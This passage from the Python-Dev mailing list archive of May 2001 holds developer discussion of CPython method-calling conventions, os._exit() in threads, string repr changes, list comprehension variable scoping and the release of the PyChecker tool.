wouldn't need > the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick > and Martin could call the underlying API with one or more PyObject* > taken directly from the Python VM stack. How then does the callee know it was called with the correct # of arguments? By adding enough pointer arguments to cover the longest possible O+ string plus 1, then verifying that the one just beyond the last one it expects is NULL, while the ones before that are not? Adding another "# of arguments" member to the method table? Inventing METH_O, METH_OO, METH_OOO, ...? > In that case, please consider at least supporting "O", "OO" and "OOO" > with optional arguments treated like I suggested in an earlier > posting (simply pass NULL and let the API take care of assigning > a default value). > > This would take care of most builtins: You don't have to convince me that cases other than plain "O" exist. What's missing is data in support of the idea that calls to those are relatively frequent enough that it's a NET win to slow plain "O" in order to speed the additional cases when they happen. For example, it's not possible for calls to reduce() to have a high hit rate in real life, because builtin_reduce is a very expensive function -- there's only so many of those you can cram into a second even if the calling overhead is 0. OTOH, add a single branch to the time it takes to find builtin_type and you've slowed its *total* execution time significantly. The implementation of METH_O alone is a pure win by any measure. So would be implementing METH_OO alone, or METH_OOO alone, etc. Mix them, and they all get slower than they could have been. All the data we have says METH_O is the single most important case, and that jibes with common sense, so I believe it. If you want to speed everything, fine, do that, but that likely requires a preprocessing phase so that type signatures don't have to be resolved at runtime at all. So long as we're just looking at simple hacks, "the simpler the better" is good advice and should rule in the absence of compelling evidence against it. From tim.one@home.com Tue May 29 02:14:16 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 21:14:16 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > Because it is a METH_OLDARGS method, you can do > > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Guido won't, and if he had even a twinge of doubt, Thomas's explanation of how this bug was introduced in 2.0 would erase it. The list.append() docs were arguably unclear when that brouhaha hit, but there's nothing unclear about the file.writelines() docs. OTOH, the file.writelines() docs still say a list is required, not "a sequence" as the 2.0 (+ current) code actually implements. Hmm. Wonder whether writelines() should be generalized to allow an iterable object? From tim.one@home.com Tue May 29 02:49:29 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 28 May 2001 21:49:29 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: [Aahz] > (This got brought up because I experimented with os._exit() as a > possible solution, but that GPFs on Win98SE.) [TIm] > Please open a bug report on that, then, with a tiny test case > if possible. > This worked fine on Win98SE for me just now: [Aahz] > Futz. *Now* it works. Now *what* works? The test case I posted, or the original test case you tried (which you didn't post)? > Chalk it up to another unreproducible bug caused by an unstable Win98. Actually doubt it -- threads are very reliable on Win98, despite that little else is (malloc() is flaky, popen() is a nightmare, etc). Here's a recent bug report on a Red Hot box that may be related: http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 I have no idea what's supposed to happen if you call os._exit from a *spawned* thread (perhaps that's what you did too? I did not) -- threads are outside the scope of the C std, so I suppose it's a x-platform crapshoot. From greg@cosc.canterbury.ac.nz Tue May 29 03:12:55 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:12:55 +1200 (NZST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" > I took a special look at METH_OLDARGS occurrences. Shouldn't all these be removed? I would have thought list.append was the last one! Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Tue May 29 03:33:58 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 29 May 2001 14:33:58 +1200 (NZST) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz> Samuele Pedroni writes: > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging I think there should be methods operating directly on stack frames for debuggers to use. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From jepler@mail.inetnebr.com Tue May 29 03:32:05 2001 From: jepler@mail.inetnebr.com (Jeff Epler) Date: Mon, 28 May 2001 21:32:05 -0500 Subject: [Python-Dev] Killing threads In-Reply-To: ; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400 References: <20010524045938.5228199C83@waltz.rahul.net> Message-ID: <20010528213205.A1236@localhost.localdomain> On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote: > Here's a recent bug report on a Red Hot box that may be related: > > http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 > > I have no idea what's supposed to happen if you call os._exit from a > *spawned* thread (perhaps that's what you did too? I did not) -- threads > are outside the scope of the C std, so I suppose it's a x-platform > crapshoot. I wrote that program after the first go-round about _exit and threads, and when I got behavior I didn't expect, I entered it in the SF bug tracker. My reasoning: The documentation for _exit() says it is "used to exit the child process after a fork()", and my model for thinking about threads is that they're "child processes, but ...". Thus, invoking os._exit() in a thread made sense to me, meaning "ask the OS to destroy this thread now, but leave my file descriptors, etc., alone for the other threads." Your suggestion in the tracker of writing the equivalent C program is a good one, though my suspicion (which I did not voice in the SF report) was that perhaps the thread which called _exit() held the GIL, in which case it was in some sense Python's fault that execution didn't continue. In any case, I don't have the faintest idea how to program threads in C/pthreads, so I can't write the "equivalent C program". In fact, a traceback from the hung "sleep(1)" thread shows (gdb) where #0 0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45 #1 0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934 #2 0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34 #3 0x08067ba0 in PyThread_acquire_lock () at eval.c:41 #4 0x08051ff1 in PyEval_RestoreThread () at eval.c:41 #5 0x40019ef9 in floatsleep () at eval.c:41 #6 0x400193fd in time_sleep () at eval.c:41 [...] While those line numbers look a little fishy (eval.c:41 for all three frames?), I think this might support my supposition. Of course, if os._exit() has no intended use in a threaded program, then this behavior is as good as any. Jeff From tim.one@home.com Tue May 29 05:03:38 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 00:03:38 -0400 Subject: [Python-Dev] Killing threads In-Reply-To: <20010528213205.A1236@localhost.localdomain> Message-ID: [Jeff Epler, on http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735 ] > My reasoning: The documentation for _exit() says it is "used to exit the > child process after a fork()", and my model for thinking about threads > is that they're "child processes, but ...". Thus, invoking os._exit() > in a thread made sense to me, meaning "ask the OS to destroy this thread > now, but leave my file descriptors, etc., alone for the other threads." You need a Linux expert to address this. Threads and processes are different beasts under most flavors of Unix, but Linux confuses them; I've no idea how _exit() is supposed to work there, and that's why I asked (in the bug report) what the Linux docs say about that (_exit() is supplied by your local C library; Python just wraps it). If what you really wanted was just to abort the thread, use thread.exit() (aee the thread docs). os._exit() is a dangerous thing even in the best of conditions; unsure why the Python docs suggest using it. > Your suggestion in the tracker of writing the equivalent C program is a > good one, though my suspicion (which I did not voice in the SF report) > was that perhaps the thread which called _exit() held the GIL, in which > case it was in some sense Python's fault that execution didn't continue. Ah, makes sense! Yes, I bet that's what's happening. If so, there's nothing Python can do about it: I'm afraid you did it to yourself. _exit() specifically asks that no cleanup processing be done, and when Python calls it Python never regains control. If you had done an actual fork, fine, the *process* doing the _exit() would never come back to Python, but the GIL in that process has nothing to do with the GIL in the parent process. But threads share the same GIL, and if you _exit() from a thread holding the GIL then no other thread can ever run again. Looks like it's also platform-dependent: on Windows, _exit() kills the process and every thread ever spawned by that process. Since C doesn't say anything about threads, that can't be called right or wrong. Looks like on Linux _exit() only kills the thread that calls it. > ... > Of course, if os._exit() has no intended use in a threaded program, Right, it wasn't -- unless your program panics and wants to get out ASAP no matter what the consequences. > then this behavior is as good as any. And better than most . From tim.one@home.com Tue May 29 05:16:46 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 00:16:46 -0400 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz> Message-ID: [Martin] > I took a special look at METH_OLDARGS occurrences. [GregE] > Shouldn't all these be removed? I would have thought > list.append was the last one! I count 42 of them remaining, usually for 0-argument functions. METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can distinguish between "called with nothing" and "called with something" under OLDARGS. However, they don't appear to catch keyword args: >>> {}.clear(2) # complains Traceback (most recent call last): File "", line 1, in ? TypeError: function takes no arguments >>> {}.clear(val=12, hohoho=666) # accepts nonsense silently >>> the-more-you-look-the-messier-it-gets-ly y'rs - tim From tim.one@home.com Tue May 29 07:06:19 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 02:06:19 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org> Message-ID: ESR> Apparently the Universe is an even more random place than I ESR> thought. [Barry A. Warsaw] > here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, That's what Einstein believed (i.e., that it isn't truly random). Unfortunately, according to another recent thread, Einstein was afraid to use equations because he didn't want to cut Stephen Hawking's editor's penis in half -- or something like that. Whichever, consensus still holds that Einstein lost this one. i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace- crying-for-help-ly y'rs - tim From tim.one@home.com Tue May 29 07:15:07 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 02:15:07 -0400 Subject: [Python-Dev] RE: What happened to Idle's extend.py? In-Reply-To: Message-ID: Guido's on vacation. Anyone have an answer for this? I don't, and can't make time to dig into now. If you can, David's address showed up as mailto:boogiemorg@aol.com > -----Original Message----- > From: python-list-admin@python.org > [mailto:python-list-admin@python.org]On Behalf Of David Morgenthaler > Sent: Wednesday, May 23, 2001 6:20 PM > To: python-list@python.org > Subject: What happened to Idle's extend.py? > > > Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was > used to extend Idle. We've used this extensively, building entire > "applications" as Idle extensions. > > Now that we're moving to Python 2.1, we find the same old directions > for extending Idle (in extend.txt), but there appears to be no > extend.py in Idle-0.8. > > Does anyone know how we can add extensions to Idle-0.8? > > Thanks in advance, > David > -- > http://mail.python.org/mailman/listinfo/python-list From mwh@python.net Tue May 29 09:00:42 2001 From: mwh@python.net (Michael Hudson) Date: Tue, 29 May 2001 09:00:42 +0100 (BST) Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: Message-ID: On Tue, 29 May 2001, Tim Peters wrote: > [Martin] > > I took a special look at METH_OLDARGS occurrences. > > [GregE] > > Shouldn't all these be removed? I would have thought > > list.append was the last one! > > I count 42 of them remaining, usually for 0-argument functions. There are more than that; PyMethodDefs that don't put anything in that slot in the source are METH_OLDARGS too, and there are quite a few of them in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the older modules - gl, rotor were easy to find). There are also quite a lot of functions that put literal zeros there, too. So METH_OLDARGS is far from dead, sadly. Cheers, M. From tim.one@home.com Tue May 29 09:04:48 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 29 May 2001 04:04:48 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> Message-ID: [from Monday, May 21, 2001 1:04 PM] [Tim] >> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. [Martin v. Loewis] > Any reason why PyThreadState_GET isn't used there? Perhaps somebody's shift key got jammed? sure-don't-see-a-good-reason-ly y'rs - tim From thomas@xs4all.net Tue May 29 10:52:01 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Tue, 29 May 2001 11:52:01 +0200 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) Message-ID: <20010529115201.J676@xs4all.nl> Robin apparently ran into a real problem caused by the change in string repr() semantics. Now, arguably this is his own stupid fault (and indeed he argues that himself) but that doesn't mean we shouldn't take this into account. We could, for instance, revert 2.1.1 to the old behaviour, giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide what the string repr() change really wanted was just for the REPL to print it like this, in which case the displayhook should fix it, not string_repr. Opinions ? Ping, IIRC, this was your proposal, so yours would be especially valuable ;) ----- Forwarded message from Robin Becker ----- Date: Tue, 29 May 2001 09:58:49 +0100 From: Robin Becker To: Thomas Wouters Cc: python-list@python.org Subject: Re: string repr in 2.1 In message <20010529102414.P690@xs4all.nl>, Thomas Wouters writes >On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote: >> In article , Remco Gerlich >> writes > >> >Since 2.1, string repr uses heximal escapes instead of octal ones. > >> yes I guess all those *nix tools that like octal should be whipped and >> made to obey the malevolent dictator. > >Do you have tools you use to parse quoted (repr'd) Python strings that >handle octal correctly, but don't handle \x and \n\r escape codes ? Which >ones ? And were you aware that they were going to break sooner or later, >just because someone can prefer 'readable' escape codes and feed it that >instead ? :) > Yes I have such tools. One is called Acrobat Reader, another is traditional sed and awk. My dos grep doesn't seem to like hex, I suppose I must update it and all other tools. My C compiler understands octal and the newer ones do hex as well. I can read octal and do arithmetic in it probably easier than hex. I don't defend the octal representation it's just very widespread in the older tools. Our usage of repr was probably stupid as clearly repr can change. How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit cdc! Oh woe is me! Where are the duo-decimal calculators of yore? -- Robin Becker ----- End forwarded message ----- -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From akuchlin@mems-exchange.org Tue May 29 15:04:37 2001 From: akuchlin@mems-exchange.org (Andrew Kuchling) Date: Tue, 29 May 2001 10:04:37 -0400 Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400 References: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us> On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote: > It looks like I never replied to this. It's probably dropped off >your radar, but I'd say the answer is that the files on parrot should >be discarded sooner rather than later -- when we actually manage to Done. Out of paranoia about doing 'rm -rf' within www.python.org's tree, the files aren't deleted; instead I just moved them to my home directory on parrot. --amk From aahz@rahul.net Tue May 29 16:47:13 2001 From: aahz@rahul.net (Aahz Maruch) Date: Tue, 29 May 2001 08:47:13 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 28, 2001 09:49:29 PM Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net> Tim Peters wrote: > > [Aahz] > > Futz. *Now* it works. > > Now *what* works? The test case I posted, or the original test case you > tried (which you didn't post)? My original test case. I didn't actually preserve it, so the code below was my attempt to reconstruct it (but I think it's pretty close to the test case I tried). Don't worry, if I run into this again, I'll be *much* more careful about preserving the evidence and fiddling with variations; last time I just assumed it was pilot error. from threading import Thread import os class Foo(Thread): def run(self): while 1: pass f = Foo() f.start() os._exit(1) From beazley@cs.uchicago.edu Tue May 29 17:56:09 2001 From: beazley@cs.uchicago.edu (David Beazley) Date: Tue, 29 May 2001 11:56:09 -0500 (CDT) Subject: [Python-Dev] Iteration variables and list comprehensions Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> I'm not sure if this has ever been brought up before (I don't recall seeing it), but I would like to throw out something that has been bugging me about list comprehensions for quite some time... First of all, I have to say that I've really grown to like list comprehensions a lot. In fact, I find myself using them in just about every Python program I've been writing since switching to Python 2.0. However, I've also been shooting myself in the foot a little more than usual due to the following issue: When I write a list comprehension like this: s = [ expr(x) for x in t ] it is *VERY* easy to overlook the fact that the iteration variable "x" is evaluated in the local scope (and replaces any previous binding to "x" that might have existed outside the context of the list comprehension). Because of this, I have frequently found myself debugging the following programming error: # Some loop for x in r: ... # bunch of statements ... s = [expr(x) for x in t] ... # Try to do something with x. # ???? What in the hell is wrong with my program ???? ... The main problem is that I conceptually tend to think of the list comprehension as being some kind of list operator where the index name is really one of the operands in some sense. Because of this, it is *VERY* easy to get in the habit of throwing list comprehensions all over the place, each of which uses a common index name like x,i,j, etc. Of course, this works just fine until you forget that you're also using x,i,j for some kind of loop variable someplace else :-). Therefore, I'm wondering if it would make any sense to make the iterator variables used inside of a list comprehension private in some manner--either through name mangling or some other technique? For example: s = [expr(x) for x in t] would get expanded into something roughly like this: s = [ ] for _mangled_x in t: s.append(expr(_mangled_x)) del _mangled_x Just as an aside, I have never intentionally used the iterator variable of a list comprehension after the operation has completed. I was actually quite surprised with this behavior the first time I saw it. I suspect most other programmers would not anticipate this side effect either. Comments? Cheers, Dave From nas@python.ca Tue May 29 18:01:41 2001 From: nas@python.ca (Neil Schemenauer) Date: Tue, 29 May 2001 10:01:41 -0700 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529100141.B18974@glacier.fnational.com> David Beazley wrote: > Just as an aside, I have never intentionally used the iterator > variable of a list comprehension after the operation has completed. I've been bitten by this one once. It took a while to figure out the problem. I'm not sure that we can change it now though. Neil From skip@pobox.com (Skip Montanaro) Tue May 29 20:03:47 2001 From: skip@pobox.com (Skip Montanaro) (Skip Montanaro) Date: Tue, 29 May 2001 14:03:47 -0500 Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd) Message-ID: <15123.62099.473259.545781@beluga.mojam.com> --RlpqOaIB3+ Content-Type: text/plain; charset=us-ascii Content-Description: message body text Content-Transfer-Encoding: 7bit I pass this along in case anyone here has some ideas for Jeff about how to workaround his problems with pyexpat.c. Skip --RlpqOaIB3+ Content-Type: message/rfc822 Content-Description: forwarded message Content-Transfer-Encoding: 7bit Return-Path: Received: from wormwood.pobox.com (wormwood.pobox.com [208.210.125.20]) by manatee.mojam.com (8.11.0/8.11.0) with ESMTP id f4TI9G123689 for ; Tue, 29 May 2001 13:09:17 -0500 Received: from wormwood.pobox.com (localhost.pobox.com [127.0.0.1]) by wormwood.pobox.com (Postfix) with ESMTP id 2049572551 for ; Tue, 29 May 2001 14:09:03 -0400 (EDT) Received: from potrero.mojam.com (ns2.mojam.com [207.20.37.91]) by wormwood.pobox.com (Postfix) with ESMTP id 70F5572564 for ; Tue, 29 May 2001 14:08:59 -0400 (EDT) Received: from starship.python.net (IDENT:qmailr@starship.python.net [63.102.49.32]) by potrero.mojam.com (8.9.3/8.9.3) with SMTP id LAA32476 for ; Tue, 29 May 2001 11:09:10 -0700 Received: (qmail 21745 invoked from network); 29 May 2001 18:09:01 -0000 Received: from unknown (HELO starship.python.net) (127.0.0.1) by localhost with SMTP; 29 May 2001 18:09:01 -0000 Delivered-To: stackless@starship.python.net Received: (qmail 21719 invoked from network); 29 May 2001 18:08:36 -0000 Received: from unknown (HELO rampart.timecastle.net) (64.6.34.129) by starship.python.net with SMTP; 29 May 2001 18:08:36 -0000 Received: from taupro.com (226-72-dltx.hpnc.com [216.88.72.226]) by rampart.timecastle.net (8.9.3/8.8.7) with ESMTP id NAA17483; Tue, 29 May 2001 13:08:31 -0500 Message-ID: <3B13E514.21871F19@taupro.com> X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.16-3tau i586) X-Accept-Language: en MIME-Version: 1.0 References: <3B0A7606.603029F5@taupro.com> <3B0A83F2.2BC22C2@tismer.com> <3B0CB3F4.54BDE760@taupro.com> <3B0D21E4.EA7CCA3F@tismer.com> <3B10CC36.B33589E5@taupro.com> Content-Type: text/plain; charset=us-ascii Errors-To: stackless-admin@starship.python.net X-BeenThere: stackless@starship.python.net X-Mailman-Version: 2.0.3 Precedence: bulk List-Help: List-Post: List-Subscribe: , List-Id: The Stackless Python Mailing List List-Unsubscribe: , List-Archive: From: Jeff Rush Sender: stackless-admin@starship.python.net To: Christian Tismer , stackless@starship.python.net Subject: [Stackless] Stackless for 2.1: Progress Report Date: Tue, 29 May 2001 13:06:12 -0500 The port is pretty much done, and it passes the standard Python regression tests, except for the three XML ones. On those it executes an invalid bytecode and later, segfaults. The cause is some code in pyexpat.c that does a PyFrame_New, passing in a *dummy* codeblock (gross!) that actually points to an empty text string (instead of real bytecodes), just to have a codeblock to call PyEval_CallObject() with. I'm trying to find a workaround for that. Does anyone have/want to create some regression tests for Stackless? -Jeff Rush _______________________________________________ Stackless mailing list Stackless@starship.python.net http://starship.python.net/mailman/listinfo/stackless --RlpqOaIB3+-- From gward@python.net Tue May 29 22:21:55 2001 From: gward@python.net (Greg Ward) Date: Tue, 29 May 2001 17:21:55 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500 References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: <20010529172155.A8737@gerg.ca> On 29 May 2001, David Beazley said: > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner--either through name mangling or some other technique? For > example: Two ideas occur to me: * make the list comprehension a new scoping level, which of course is doable now that we have sensible scoping semantics. Presumably the usual warning message about shadowing variables from an outer scope will apply; you'll still have the bug in your code, but at least Python will tell you about it * don't make list comprehensions a separate scope, but add a little trickery so that something *like* the "shadowing variable from an outer scope" message is emitted Haven't really thought about backwards compatibility issues... Greg From paulp@ActiveState.com Tue May 29 22:55:03 2001 From: paulp@ActiveState.com (Paul Prescod) Date: Tue, 29 May 2001 14:55:03 -0700 Subject: [Python-Dev] Re: string repr in 2.1 (fwd) References: <20010529115201.J676@xs4all.nl> Message-ID: <3B141AB7.4C6DAFB6@ActiveState.com> Thomas Wouters wrote: > > Robin apparently ran into a real problem caused by the change in string > repr() semantics. Now, arguably this is his own stupid fault (and > indeed he argues that himself) but that doesn't mean we shouldn't take this > into account. I think it is done now and it is better this way. The pain is over. Reverting would hurt someone else again. Displayhook should be used sparingly. One of the major virtues of the REPL is that it behaves so much like standard Python. -- Take a recipe. Leave a recipe. Python Cookbook! http://www.ActiveState.com/pythoncookbook From tim@digicool.com Tue May 29 23:54:01 2001 From: tim@digicool.com (Tim Peters) Date: Tue, 29 May 2001 18:54:01 -0400 Subject: [Python-Dev] Re: Time for the yearly list.append() panic Message-ID: FYI, I checked in a variation (listobject.c) over the weekend. Win9x is ultimately hopeless, but we can grow a list there to about 35M elements now instead of crapping out at < 2M, and it's zippy the whole way until death. Win2K (and I *assume* WinNT) benefit much more, as non-linear behavior was obvious very early there. Now it's flat and fast until physical RAM is exhausted, and then it suffers looong (15-30 seconds) "hiccups" at resize points. Fred kindly confirmed that Linux isn't hurt. Its behavior looks the same as the new Win2K behavior, except that the Linux hiccups are much briefer (although still obvious when they occur). time-for-the-yearly-list.append()-celebration-ly y'rs - tim From PyChecker Wed May 30 03:49:45 2001 From: PyChecker (Neal Norwitz) Date: Tue, 29 May 2001 22:49:45 -0400 Subject: [Python-Dev] PyChecker v0.5 released Message-ID: <3B145FC9.49813488@metaslash.com> I was finally able to get version 0.5 out. Just in case this is the first time you are seeing this message, or you forgot what PyChecker is: PyChecker is a tool for finding common bugs in python source code. It finds problems that are typically caught by a compiler for less dynamic languages, like C and C++. Because of the dynamic nature of python, some warnings may be incorrect; however, spurious warnings should be fairly infrequent. The highlights are that code at the module scope is now checked. There is still a problem with class variables and globals that are default parameter values. But other than that, there should be no more spurious Variable unused warnings. Code that makes PyChecker raise an exception should now be caught in most cases and this produces a warning. Please mail me if you find it blowing up on your code. The last line processed is shown in the warning, so if you include some context, I can hopefully fix the problem. Also, PyChecker should really use the files passed on the command line, even if it uses the same module name internally. So it will check your warn.py, not PyChecker's warn.py. Feedback, comments, criticisms, new ideas, better ideas, etc. are all greatly appreciated. Thanks for everyone who has taken the time to mail me. If you can think of common mistakes that are made that PyChecker doesn't find, please let me know. Here's the CHANGELOG: * Catch internal errors "gracefully" and turn into a warning * Add checking of most module scoped code * Add pychecker subdir to imports to prevent filename conflicts * Don't produce unused local variable warning if variable name == '_' * Add -g/--allglobals option to report all global warnings, not just first * Add -V/--varlist option to selectively ignore variable not used warnings * Add test script and expected results * Print all instructions when using debug (-d/--debug) * Overhaul internal stack handling so we can look for more problems * Fix glob'ing problems (all args after glob were ignored) * Fix spurious Base class __init__ not called * Fix exception on code like: ['xxx'].index('xxx') * Fix exception on code like: func(kw=(a < b)) * Fix line numbers for import statements PyChecker is available on Source Forge: Web page: http://pychecker.sourceforge.net/ Project page: http://sourceforge.net/projects/pychecker/ Neal -- pychecker@metaslash.com From fdrake@cj42289-a.reston1.va.home.com Wed May 30 06:31:01 2001 From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake) Date: Wed, 30 May 2001 01:31:01 -0400 (EDT) Subject: [Python-Dev] [development doc updates] Message-ID: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> The development version of the documentation has been updated: http://python.sourceforge.net/devel-docs/ Incremental update for development version of Python (2.2). Mostly small updates, but I've worked on new markup for grammar productions used in the Reference Manual. Currently, only the lexical productions in Chapter 2 of the manual have been converted to the new markup and layout. Please take a look and send comments to doc-sig@python.org; the first page containing these changes is at: http://python.sourceforge.net/devel-docs/ref/identifiers.html The changes needed to implement the markup have not been checked in yet, and there are some bugs in the implementation (both for HTML and PDF), but this should make the productions easier to navigate. I've tested the HTML version on Linux only with Mozilla 0.9, Opera 5.0b8, and Netscape Navigator 4.77. Navigator is definately lagging behind in CSS support! Also added Michel Pelletier's documentation for the HTMLParser module, with some small changes. From tim.one@home.com Wed May 30 06:51:04 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 01:51:04 -0400 Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: [Fred Drake] > The development version of the documentation has been updated: > > http://python.sourceforge.net/devel-docs/ > > Incremental update for development version of Python (2.2). > > Mostly small updates, but I've worked on new markup for grammar > productions used in the Reference Manual. Currently, only the lexical > productions in Chapter 2 of the manual have been converted to the new > markup and layout. Please take a look and send comments to > doc-sig@python.org; the first page containing these changes is at: > > http://python.sourceforge.net/devel-docs/ref/identifiers.html > > The changes needed to implement the markup have not been checked in > yet, and there are some bugs in the implementation (both for HTML and > PDF), but this should make the productions easier to navigate. Let me suggest starting with http://python.sourceforge.net/devel-docs/ref/integers.html instead, and clicking on "digit" in the "hexdigit" production. The problem with the originally suggested page is that all the links point into the same paragraph, so "nothing happens" when you click one. But "digit" was the cause of a bogus bug report, as the submitter didn't realize "digit" had been defined earlier in the docs, and without something like these mondo cool new links it's almost impossible to find cross-section production definitions. Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the node24.html page it refers to doesn't seem to exist. From fdrake@acm.org Wed May 30 06:53:23 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Wed, 30 May 2001 01:53:23 -0400 (EDT) Subject: [Python-Dev] RE: [Doc-SIG] [development doc updates] In-Reply-To: References: <20010530053101.4985F28A10@cj42289-a.reston1.va.home.com> Message-ID: <15124.35539.53551.52668@cj42289-a.reston1.va.home.com> Tim Peters writes: > Stumbled into one glitch: nonzerodigit doesn't resolve correctly; the > node24.html page it refers to doesn't seem to exist. That was the bug alluded to. The digit* grouped with the nonzerodigit also doesn't work, although the other two uses of digit on that page (floating.html) work properly. I'll investigate tomorrow; just too tired tonight. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From tim.one@home.com Wed May 30 08:47:47 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 30 May 2001 03:47:47 -0400 Subject: [Python-Dev] Iteration variables and list comprehensions In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu> Message-ID: [David Beazley] > ... > However, I've also been shooting myself in the foot a little more > than usual > ... > Because of this, I have frequently found myself debugging the > following programming error: If "frequently" is "a little more than usual", then it sounds like your problems in all areas are too common for us to really help you by fixing this one . OK, I'm afraid the behavior follows from taking seriously the idea that listcomps are syntactic sugar for a specific pattern of nested loops and "if" tests. That was done to make it explainable, and the correspondence is indeed exact. The implementation already creates "invisible" names: >>> [repr(name) for name in globals().keys()] ["'__builtins__'", "'__name__'", "'name'", "'__doc__'", "'_[1]'"] >>> Where did "_[1]" come from? You guessed it. Look for it after the listcomp finishes and it's gone: >> globals().keys() '__builtins__', '__name__', 'name', '__doc__'] >> It's invisible because it's a temp var you *wouldn't* see in the equivalent loop nest. > ... > Therefore, I'm wondering if it would make any sense to make the > iterator variables used inside of a list comprehension private in some > manner I'm not sure it's worth losing the exact correspondence with nested loops; or that it's not worth it either. Note that "the iterator variables" needn't be bare names: >>> class x: ... pass ... >>> [1 for x.i in range(3)] [1, 1, 1] >>> x.i 2 >>> This complicates explaining exactly how you want to deviate from the for-loop model. So, I think, does this: >>> [i for i in range(2) for i in range(2, 5)] [2, 3, 4, 2, 3, 4] >>> That is, even in simple cases, is the desired scope attached to the "for" or to the "[]"? Python doesn't have a problem with reusing a name as a for target in nested loops (or in listcomps today). > ... > 